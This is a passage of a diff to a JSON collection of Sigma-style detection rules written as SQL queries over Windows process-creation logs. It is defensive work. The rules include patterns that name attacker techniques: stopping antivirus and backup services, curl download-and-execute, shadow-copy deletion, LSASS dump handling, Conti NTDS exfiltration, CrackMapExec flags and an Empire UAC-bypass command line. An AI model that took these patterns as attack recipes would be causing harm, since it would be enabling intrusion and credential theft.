'\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' 
AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name 
IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% 
-u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", 
@@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS 
Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' 
ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - 
"status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": 
"e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or 
modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT 
